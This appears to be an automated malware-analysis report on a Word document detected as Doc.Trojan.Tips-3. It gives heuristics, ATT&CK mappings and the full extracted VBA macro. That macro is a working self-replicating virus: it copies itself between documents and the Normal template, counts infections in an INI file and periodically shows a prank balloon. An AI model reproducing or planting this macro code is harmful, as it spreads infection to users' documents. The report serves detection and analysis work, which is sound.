MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The AutoOpen macro is designed to execute automatically when the document is opened, which is a common technique for delivering malicious payloads. The macro attempts to manipulate the application's caption and status bar, potentially to mislead the user. While the full script is truncated, the presence of AutoOpen and the ClamAV detection strongly suggest malicious intent.
Heuristics 4
-
ClamAV: Doc.Trojan.Tips-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tips-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3672 bytes |
SHA-256: 6106fa3d44df470c995b81c29dc10477a7e92370d7dca1c745d13a3b19e2b673 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tips-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 01/18/99 by billgates from cuddapah"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.AutoOpen"
'
' AutoOpen Macro
' Macro created 01/18/99 by CUDDAPAH BELLGATES FROM MACROSHOFT
'
Dim newstr, filenme, oldstr, normal_template As String
Dim o_docname, n_docname As String
Dim source_name, target_name, temp_var As String
Dim cond_name As String
Dim vrbl As Integer
Dim i As Integer
Dim j As Long
Dim cntnr As Object
Dim retval
Set cntnr = MacroContainer
'MsgBox cntnr.Name & " Is the container of this running code", vbCritical
cond_name = cntnr.Name
On Error GoTo err1
newstr = Application.ActiveWindow.Caption
filenme = newstr
newstr = newstr & " " & " "
Application.Caption = "Microsoft Word"
oldstr = newstr
Application.ActiveWindow.Caption = newstr
'Application.StatusBar = "Remember Microsoft Word is a Product of ORACLE Corporation INC!!!."
o_docname = Application.ActiveDocument.path
o_docname = o_docname & "\" & Application.ActiveDocument.Name
' ********* getting the source file name **********
If cond_name = Application.NormalTemplate.Name Then
'MsgBox "Condition One", vbCritical
source_name = Application.NormalTemplate.path
source_name = source_name & "\" & Application.NormalTemplate.Name
' ********* getting the target file name ***********
target_name = Application.ActiveDocument.path
target_name = target_name & "\" & Application.ActiveDocument.Name
Else
'MsgBox "Condition Two", vbCritical
source_name = Application.ActiveDocument.path
source_name = source_name & "\" & Application.ActiveDocument.Name
target_name = Application.NormalTemplate.path
target_name = target_name & "\" & Application.NormalTemplate.Name
End If
'MsgBox source_name & " " & target_name
'on counter set to four then message and counter = 0
temp_var = System.PrivateProfileString("C:\micros.Ini", "MacroSettings", _
"LastFile")
vrbl = Val(temp_var)
If vrbl = "8" Then
vrbl = 0
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
"LastFile") = Str(vrbl)
Set BLN = Assistant.NewBalloon
With BLN
.Heading = "Tips of the Day"
.Labels(1).Text = "Don't Shit in the Public Places."
.Labels(2).Text = "Don't throw Your Undergarments whereever u want"
.Labels(3).Text = "Don't Spit on your self"
.BalloonType = msoBalloon
.Mode = msoModeModal
.Icon = msoIconAlert
.Button = msoButtonSetOK
retval = .Show
End With
Application.ActiveWindow.Close
End If
vrbl = vrbl + 1
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
"LastFile") = Str(vrbl)
'MsgBox System.PrivateProfileString("C:\VirSet.Ini", "MacroSettings", _
"LastFile")
normal_template = Application.NormalTemplate.Name
On Error GoTo err0
Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy source_name, target_name, "BILLGATES", wdOrganizerObjectProjectItems
If target_name = normal_template Then
Application.NormalTemplate.Save
End If
Application.ActiveDocument.Save
'MsgBox o_docname
'MsgBox Application.ActiveDocument.Name
err0:
'MsgBox Err.Description
Exit Sub
err1:
End Sub
Attribute VB_Name = "BILLGATES"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.